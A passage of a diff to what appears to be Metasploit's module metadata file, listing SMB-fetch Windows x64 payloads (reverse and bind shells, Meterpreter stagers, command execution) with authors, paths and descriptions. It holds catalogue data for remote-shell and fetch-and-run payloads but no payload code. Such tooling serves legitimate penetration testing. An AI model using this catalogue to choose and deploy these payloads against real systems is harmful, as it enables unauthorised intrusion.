"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/custom/reverse_tcp_rc4": { + "name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/custom/reverse_tcp_uuid": { + "name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/custom/reverse_winhttp": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/smb/x64/custom/reverse_winhttps": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/smb/x64/encrypted_shell/reverse_tcp": { + "name": "SMB Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/smb/x64/encrypted_shell_reverse_tcp": { + "name": "SMB Fetch, Windows Encrypted Reverse Shell", + "fullname": "payload/cmd/windows/smb/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/exec": { + "name": "SMB Fetch, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/smb/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/smb/x64/loadlibrary": { + "name": "SMB Fetch, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/smb/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "scriptjunkie", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/smb/x64/messagebox": { + "name": "SMB Fetch, Windows MessageBox x64", + "fullname": "payload/cmd/windows/smb/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "pasta " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_named_pipe": { + "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_tcp": { + "name": "SMB Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_tcp_rc4": { + "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_tcp_uuid": { + "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_http": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_https": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_named_pipe": { + "name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp": { + "name": "SMB Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4": { + "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid": { + "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_winhttp": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_winhttps": { + "name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/smb/x64/meterpreter_bind_named_pipe": { + "name": "SMB Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_bind_tcp": { + "name": "SMB 